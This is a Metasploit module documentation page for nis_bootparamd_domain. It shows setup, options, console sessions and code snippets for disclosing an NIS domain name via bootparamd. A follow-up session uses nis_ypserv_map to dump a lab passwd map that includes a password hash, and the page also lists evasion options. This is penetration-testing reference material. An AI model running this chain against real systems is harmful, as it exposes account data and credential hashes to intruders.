NIS bootparamd Domain Name Disclosure - Metasploit


This page contains detailed information about how to use the auxiliary/gather/nis_bootparamd_domain metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: NIS bootparamd Domain Name Disclosure
Module: auxiliary/gather/nis_bootparamd_domain
Source code: modules/auxiliary/gather/nis_bootparamd_domain.rb
Disclosure date: -
Last modification time: 2020-08-14 13:11:38 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 111
List of CVEs: -

This module discloses the NIS domain name from bootparamd. You must know a client address from the target's bootparams file. Hint: try hosts within the same network range as the target.

Module Ranking and Traits

Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage

msf > use auxiliary/gather/nis_bootparamd_domain
msf auxiliary(nis_bootparamd_domain) > show targets
    ... a list of targets ...
msf auxiliary(nis_bootparamd_domain) > set TARGET target-id
msf auxiliary(nis_bootparamd_domain) > show options
    ... show and set options ...
msf auxiliary(nis_bootparamd_domain) > exploit

Required Options

  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • CLIENT: Client from target's bootparams file

Knowledge Base

Introduction

From the bootparamd(8) man page:

bootparamd is a server process that provides information to diskless clients necessary for booting. It consults the /etc/bootparams file to find the information it needs.

The module documented within will allow a tester to disclose the NIS domain name from a server running bootparamd. After knowing the domain name, the tester can follow up with auxiliary/gather/nis_ypserv_map to dump a map from a compatible NIS server (running as ypserv).

Setup

Set up NIS as per https://help.ubuntu.com/community/SettingUpNISHowTo. If the link is down, you can find it via the Wayback Machine.

After that is done, install bootparamd however your OS provides it.

Make sure you add a client to the bootparams file, which is usually at /etc/bootparams.

Here is an example bootparams file (courtesy of @bcoles):

clientname root=nfsserver:/export/clientname/root

You can read the bootparams(5) man page for more info.

Lastly, the client should be added to /etc/hosts if it isn't already resolvable.

Options

PROTOCOL

Set this to either TCP or UDP. UDP is the default due to bootparamd.

CLIENT

Set this to the address of a client in the target's bootparams file. Usually this is a host within the same network range as the target.

XDRTimeout

Set this to the timeout in seconds for XDR decoding of the response.

Usage

msf > use auxiliary/gather/nis_bootparamd_domain
msf auxiliary(gather/nis_bootparamd_domain) > set rhost 192.168.33.10
rhost => 192.168.33.10
msf auxiliary(gather/nis_bootparamd_domain) > set client 192.168.33.10
client => 192.168.33.10
msf auxiliary(gather/nis_bootparamd_domain) > run

[+] 192.168.33.10:111 - NIS domain name for host ubuntu-xenial (192.168.33.10) is gesellschaft
[*] Auxiliary module execution completed
msf auxiliary(gather/nis_bootparamd_domain) >

After disclosing the domain name, you can use auxiliary/gather/nis_ypserv_map to dump a map from a compatible NIS server.

msf auxiliary(gather/nis_bootparamd_domain) > use auxiliary/gather/nis_ypserv_map
msf auxiliary(gather/nis_ypserv_map) > set rhost 192.168.33.10
rhost => 192.168.33.10
msf auxiliary(gather/nis_ypserv_map) > set domain gesellschaft
domain => gesellschaft
msf auxiliary(gather/nis_ypserv_map) > run

[+] 192.168.33.10:111 - Dumping map passwd.byname on domain gesellschaft:
list:*:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
ubuntu:$6$LXFAVGTO$yiCXi1KjLynOrapuhJE7tKnvdwknDMKiKM7Z8ZB19ht6CHmsS.CbUTm8q0cy5fFHEqA.Sg4Acl.0UtY.Y0JNE1:1000:1000:Ubuntu:/home/ubuntu:/bin/bash
games:*:5:60:games:/usr/games:/usr/sbin/nologin
news:*:9:9:news:/var/spool/news:/usr/sbin/nologin
lp:*:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
sys:*:3:3:sys:/dev:/usr/sbin/nologin
backup:*:34:34:backup:/var/backups:/usr/sbin/nologin
uucp:*:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
systemd-resolve:*:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
man:*:6:12:man:/var/cache/man:/usr/sbin/nologin
bin:*:2:2:bin:/bin:/usr/sbin/nologin
gnats:*:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
sync:*:4:65534:sync:/bin:/bin/sync
systemd-network:*:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
uuidd:*:108:112::/run/uuidd:/bin/false
dnsmasq:*:109:65534:dnsmasq,,,:/var/lib/misc:/bin/false
root:*:0:0:root:/root:/bin/bash
sshd:*:110:65534::/var/run/sshd:/usr/sbin/nologin
systemd-bus-proxy:*:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
irc:*:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
messagebus:*:107:111::/var/run/dbus:/bin/false
_apt:*:105:65534::/nonexistent:/bin/false
mail:*:8:8:mail:/var/mail:/usr/sbin/nologin
syslog:*:104:108::/home/syslog:/bin/false
daemon:*:1:1:daemon:/usr/sbin:/usr/sbin/nologin
systemd-timesync:*:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
pollinate:*:111:1::/var/cache/pollinate:/bin/false
www-data:*:33:33:www-data:/var/www:/usr/sbin/nologin
proxy:*:13:13:proxy:/bin:/usr/sbin/nologin
lxd:*:106:65534::/var/lib/lxd/:/bin/false

[*] Auxiliary module execution completed
msf auxiliary(gather/nis_ypserv_map) >

Go back to menu.

Msfconsole Usage

Here is how the gather/nis_bootparamd_domain auxiliary module looks in the msfconsole:

msf6 > use auxiliary/gather/nis_bootparamd_domain

msf6 auxiliary(gather/nis_bootparamd_domain) > show info

       Name: NIS bootparamd Domain Name Disclosure
     Module: auxiliary/gather/nis_bootparamd_domain
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  SATAN
  pentestmonkey
  wvu <[email protected]>

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  CLIENT                     yes       Client from target's bootparams file
  PROTOCOL  udp              yes       Protocol to use (Accepted: tcp, udp)
  RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT     111              yes       The target port (TCP)

Description:
  This module discloses the NIS domain name from bootparamd. You must 
  know a client address from the target's bootparams file. Hint: try 
  hosts within the same network range as the target.

References:
  https://tools.ietf.org/html/rfc1831
  https://tools.ietf.org/html/rfc4506
  http://pentestmonkey.net/blog/nis-domain-name

Module Options

This is a complete list of options available in the gather/nis_bootparamd_domain auxiliary module:

msf6 auxiliary(gather/nis_bootparamd_domain) > show options

Module options (auxiliary/gather/nis_bootparamd_domain):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   CLIENT                     yes       Client from target's bootparams file
   PROTOCOL  udp              yes       Protocol to use (Accepted: tcp, udp)
   RHOSTS                     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT     111              yes       The target port (TCP)

Advanced Options

Here is a complete list of advanced options supported by the gather/nis_bootparamd_domain auxiliary module:

msf6 auxiliary(gather/nis_bootparamd_domain) > show advanced

Module advanced options (auxiliary/gather/nis_bootparamd_domain):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CHOST                            no        The local client address
   CPORT                            no        The local client port
   ConnectTimeout  10               yes       Maximum number of seconds to establish a TCP connection
   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL             false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                        no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode   PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion      Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   TIMEOUT         10               yes       Number of seconds to wait for responses to RPC calls
   VERBOSE         false            no        Enable detailed status messages
   WORKSPACE                        no        Specify the workspace for this module
   XDRTimeout      10.0             yes       XDR decoding timeout

Auxiliary Actions

This is a list of all auxiliary actions that the gather/nis_bootparamd_domain module can do:

msf6 auxiliary(gather/nis_bootparamd_domain) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options

Here is the full list of possible evasion options supported by the gather/nis_bootparamd_domain auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(gather/nis_bootparamd_domain) > show evasion

Module evasion options:

   Name                               Current Setting  Required  Description
   ----                               ---------------  --------  -----------
   ONCRPC::tcp_request_fragmentation  false            no        Enable fragmentation of TCP ONC/RPC requests
   TCP::max_send_size                 0                no        Maxiumum tcp segment size.  (0 = disable)
   TCP::send_delay                    0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages

This module may fail with the following error messages:

Error Messages

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Could not connect to portmapper

Here is a relevant code snippet related to the "Could not connect to portmapper" error message:

50:	        proto,  # Protocol: UDP (17)
51:	        100026, # Program: BOOTPARAMS (100026)
52:	        1       # Program Version: 1
53:	      )
54:	    rescue Rex::ConnectionError
55:	      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
56:	    rescue Rex::Proto::SunRPC::RPCError
57:	      fail_with(Failure::Unreachable, 'Could not connect to bootparamd')
58:	    end
59:	
60:	    # Flavor: AUTH_NULL (0)

Could not connect to bootparamd

Here is a relevant code snippet related to the "Could not connect to bootparamd" error message:

52:	        1       # Program Version: 1
53:	      )
54:	    rescue Rex::ConnectionError
55:	      fail_with(Failure::Unreachable, 'Could not connect to portmapper')
56:	    rescue Rex::Proto::SunRPC::RPCError
57:	      fail_with(Failure::Unreachable, 'Could not connect to bootparamd')
58:	    end
59:	
60:	    # Flavor: AUTH_NULL (0)
61:	    sunrpc_authnull
62:

Could not call bootparamd procedure

Here is a relevant code snippet related to the "Could not call bootparamd procedure" error message:

72:	      res = sunrpc_call(
73:	        1,               # Procedure: WHOAMI (1)
74:	        bootparam_whoami # Boot Parameters
75:	      )
76:	    rescue Rex::Proto::SunRPC::RPCError
77:	      fail_with(Failure::NotFound, 'Could not call bootparamd procedure')
78:	    rescue Rex::Proto::SunRPC::RPCTimeout
79:	      fail_with(Failure::NotVulnerable,
80:	                'Could not disclose NIS domain name (try another CLIENT?)')
81:	    ensure
82:	      # Shut it down! Shut it down forever!

No response from server

Here is a relevant code snippet related to the "No response from server" error message:

82:	      # Shut it down! Shut it down forever!
83:	      sunrpc_destroy
84:	    end
85:	
86:	    unless res
87:	      fail_with(Failure::Unreachable, 'No response from server')
88:	    end
89:	
90:	    bootparams = begin
91:	      Timeout.timeout(datastore['XDRTimeout']) do
92:	        parse_bootparams(res)

Could not parse bootparams

Here is a relevant code snippet related to the "Could not parse bootparams" error message:

95:	      fail_with(Failure::TimeoutExpired,
96:	                'XDR decoding timed out (try increasing XDRTimeout?)')
97:	    end
98:	
99:	    if bootparams.blank?
100:	      fail_with(Failure::Unknown, 'Could not parse bootparams')
101:	    end
102:	
103:	    bootparams.each do |host, domain|
104:	      msg = "NIS domain name for host #{host} (#{client}) is #{domain}"
105:

Go back to menu.

References

See Also

Check also the following modules related to this module:

Authors

  • SATAN
  • pentestmonkey
  • wvu

Version

This page has been produced using Metasploit Framework version 6.1.27-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.